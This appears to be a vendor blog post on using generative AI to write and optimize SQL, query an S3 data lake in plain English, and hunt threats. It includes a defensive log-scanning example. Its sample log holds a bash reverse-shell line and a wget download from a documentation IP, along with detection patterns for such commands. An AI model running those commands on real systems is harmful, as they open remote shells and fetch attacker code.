How to use GenAI for database query optimization and natural language analysis
In the past, querying a database required Structured Query Language (SQL) skills, or knowledge of other database query languages, such as Kibana Query Language (KQL). Today, with the emergence of generative AI (GenAI), teams can query their analytic database using natural language — and get plain English results in return.
If you prefer to keep writing SQL, GenAI can also help with database query optimization, making queries faster and more efficient. These AI-driven recommendations can simplify the search for information, making it easier for anyone to make data-driven business decisions.
Let’s explore how to use generative AI with databases, including data lakes, and how it can make asking questions of your data much easier for business users.
What is generative AI?
Large language models (LLMs) and their use in databases
With the launch of tools like OpenAI’s ChatGPT, GenAI has captured mainstream attention. The breadth and depth of its use cases have led to an explosion of new applications ranging from code assistants to writing tools. The foundation models on which these tools are built, known as large language models (LLMs), are trained on massive datasets, so they can recognize and interpret natural language fairly accurately.
By their very nature, natural language queries (like questions written in plain English) are classified as unstructured queries, since they do not follow any specific format or rules. Structured queries, such as SQL queries, follow a strict syntax and are intended to retrieve a specific result from a relational database.
Over time, databases have evolved to support different types of data models and querying formats. Today’s multi-model databases support multiple data models and allow users to query both structured data (think columns in a spreadsheet) and unstructured data. OpenAI integrations create even more opportunities for true multi-model databases, letting users query data and get answers using simple, natural language questions.
Generally speaking, LLMs hold great promise but have some known pitfalls. Hallucination (when the system makes up facts), cost, and security are among the top concerns. For example, many enterprises do not want to share their data with publicly available LLMs because of data privacy and security concerns. However, new technologies combine the best of LLMs and databases, so teams can explore data in natural language and get deterministic analytical results based on their data, without any raw data being shared with the LLM.
How to use AI-driven queries with your database
There are a few different ways you can use GenAI with your database. Let’s start with the database query optimization use case. If you write your own SQL queries, you know this process can be complex. You don’t always get the desired results from your data the first time around, and queries against complex datasets can take a long time to execute. GenAI can help you write, debug, and optimize SQL or Elasticsearch queries in less time, resulting in better database performance and faster data analysis.
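Whatever a GenAI assistant suggests, it is worth checking that the suggestion really changes how the database runs the query. The sketch below is one way to do that, using SQLite from Python’s standard library as a stand-in for your own database. The orders table, the idx_orders_customer index, and the idea that the assistant recommended an index are all assumptions made for illustration.

```python
import sqlite3

def query_plan(conn, sql):
    """Return the plan detail strings SQLite reports for a query."""
    rows = conn.execute("EXPLAIN QUERY PLAN " + sql).fetchall()
    return [row[3] for row in rows]  # column 3 holds the human-readable detail

# Hypothetical table with sample rows, used only for this illustration.
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE orders (id INTEGER PRIMARY KEY, customer_id INTEGER, total REAL)"
)
conn.executemany(
    "INSERT INTO orders (customer_id, total) VALUES (?, ?)",
    [(i % 100, i * 1.5) for i in range(1000)],
)

sql = "SELECT total FROM orders WHERE customer_id = 42"
plan_before = query_plan(conn, sql)

# Assumed suggestion from the assistant: index the filtered column.
conn.execute("CREATE INDEX idx_orders_customer ON orders (customer_id)")
plan_after = query_plan(conn, sql)

print("before:", plan_before)
print("after: ", plan_after)
```

The exact wording of the plan differs between SQLite versions, but the first plan should describe a full scan of the table and the second should mention the new index. Other databases expose similar information through their own EXPLAIN commands.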
Or, you may choose to use GenAI to execute queries and go straight from natural language to results from your data. Imagine talking to your data and having your data talk to you.
Using artificial intelligence for threat hunting
For example, in a cybersecurity setting, GenAI can be used for threat hunting. A security analyst can use an unstructured query in plain language, such as “Which threat commands should I look for in a Linux operating system?” Monitoring for these commands in log data or process data can help proactively identify and detect threats.
AI technology in a database might respond with specific commands that bad actors might use to exploit your system. For example, they may be executing commands to:
- Escalate privileges
- Gain unauthorized root access
- Download remote files containing malicious code or tools
- Establish reverse shells used for creating backdoors for unauthorized access
- Take other actions in your system that may mimic the behavior of an administrator and otherwise go unnoticed
From there, you can use GenAI to ask your database to write a search query that looks for those commands.
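As a rough illustration of what such a search might look like, here is a minimal Python sketch that scans log lines for a few of the command categories listed above. The patterns, the log format, and the find_suspicious helper are assumptions made for this example; they are not a complete detection ruleset and not the output of any particular product.

```python
import re

# Illustrative patterns only, covering a few categories from the list above.
SUSPICIOUS_PATTERNS = {
    "privilege escalation": re.compile(r"\bsudo\s+(su|-i)\b|\bchmod\s+[ug]?\+s\b"),
    "remote download": re.compile(r"\b(wget|curl)\b.*https?://"),
    "reverse shell": re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s"),
}

def find_suspicious(log_lines):
    """Return (line_number, category, line) for every pattern match."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        for category, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                hits.append((number, category, line))
    return hits

# Hypothetical process log; the addresses come from a documentation-only IP range.
sample_log = [
    "user=alice cmd=ls -la /home/alice",
    "user=bob cmd=sudo su -",
    "user=bob cmd=wget http://203.0.113.5/tool.sh",
    "user=bob cmd=bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
]

for number, category, line in find_suspicious(sample_log):
    print(number, category, line)
```

In practice, the same patterns would be expressed in your database’s own query language and run against the full log dataset rather than a Python list.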
Exploring business data and generating insights in natural language
While many business analysts are SQL power users, natural language querying capabilities can open up opportunities for SQL novices to explore datasets and ask their own questions. Alternatively, AI technology can make it much easier and faster for business analysts to do their jobs and make data-driven recommendations.
For example, an ecommerce analyst may want to explore a variety of customer data, slicing and dicing by different datasets such as customer views, line item views, or order views. One possibility is to use a natural language query to search the customer dataset and determine which regions have the highest number of customers.
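To make this concrete, here is a minimal sketch of the kind of SQL a GenAI tool might produce for the regions question, run against a small in-memory SQLite database from Python. The customers table, its columns, and the sample rows are hypothetical; a real customer dataset will have its own schema.

```python
import sqlite3

# Hypothetical customer dataset, created in memory for illustration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, region TEXT)")
conn.executemany(
    "INSERT INTO customers (name, region) VALUES (?, ?)",
    [("Ana", "EMEA"), ("Ben", "AMER"), ("Chen", "APAC"),
     ("Dee", "AMER"), ("Eli", "AMER"), ("Fay", "EMEA")],
)

# Question: "Which regions have the highest number of customers?"
REGION_QUERY = """
SELECT region, COUNT(*) AS customer_count
FROM customers
GROUP BY region
ORDER BY customer_count DESC, region ASC
"""

top_regions = conn.execute(REGION_QUERY).fetchall()
print(top_regions)  # [('AMER', 3), ('EMEA', 2), ('APAC', 1)]
```

Sorting by region as a tiebreaker keeps the output stable when two regions have the same number of customers.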
Or, they may wish to execute more complex queries that analyze data across multiple datasets, such as: “What is the relationship between customer demographics and order values?” or “How do supplier choices impact product availability and order fulfillment?” The analyst can ask the GenAI tool to write a SQL query that answers these questions, then copy and paste the query into Superset (SQL) or OpenDashboards (Elasticsearch) to get the desired results.
Querying an Amazon S3 data lake with GenAI
Using a tool like ChaosSearch combined with Chaos AI Assistant, organizations can query their data lake directly in S3, in natural language and without data movement. Chaos AI Assistant is an LLM-powered chat module that enables users to interact with their Amazon S3 data in natural language.
Via integrations with OpenAI’s ChatGPT and Anthropic’s Claude 2 on Amazon Bedrock, users can now leverage the best of LLMs (the ability to interact in natural language) and of Chaos LakeDB (live, deterministic results at scale at a fraction of the cost).
Users can ask questions of their ChaosSearch data to better understand how to leverage it for their high-level goals, or go straight from question to query to results via the ChaosSearch platform. All of this is done without sharing any raw data contents with the LLM (only the schema is used for prompting, to give the LLM context from the start).
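The general idea of schema-only prompting can be sketched in a few lines of Python. This is not how ChaosSearch implements it; it is a minimal illustration that uses SQLite as a stand-in data store. The schema_only_prompt helper, the prompt wording, and the orders table are all assumptions, and no LLM is actually called.

```python
import sqlite3

def schema_only_prompt(conn, question):
    """Build an LLM prompt from table and column names, never from row values."""
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name"
    ).fetchall()
    lines = []
    for (table,) in tables:
        # Each table_info row is (cid, name, type, notnull, dflt_value, pk).
        columns = conn.execute(f'PRAGMA table_info("{table}")').fetchall()
        described = ", ".join(f"{col[1]} {col[2]}" for col in columns)
        lines.append(f"{table}({described})")
    schema_text = "\n".join(lines)
    return (
        "Write a SQL query for the question below.\n"
        f"Schema:\n{schema_text}\n"
        f"Question: {question}"
    )

# Hypothetical table containing a sensitive value that must stay out of the prompt.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (id INTEGER, customer_email TEXT, total REAL)")
conn.execute("INSERT INTO orders VALUES (1, 'alice@example.com', 19.99)")

prompt = schema_only_prompt(conn, "What is the average order total?")
print(prompt)
```

The prompt contains the table and column names, but the email address stored in the table never appears in it. The query the LLM returns would then be executed by the database itself, which is what keeps the results deterministic.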
AI technology and databases: democratizing data analytics
We’ve covered multiple use cases for LLMs and GenAI in databases in an analytics context, including:
- Writing, optimizing, or debugging SQL or Elasticsearch queries
- Querying your data in natural language and getting immediate answers to questions
The goal for LLMs and GenAI is to help analysts and business users gain more value from their data, without requiring the technical expertise to write database queries in a certain structured format. This technology has the potential to democratize data access and analytics across a larger population of business users, allowing them to get more value out of their business data and execute on data-driven decision-making at scale.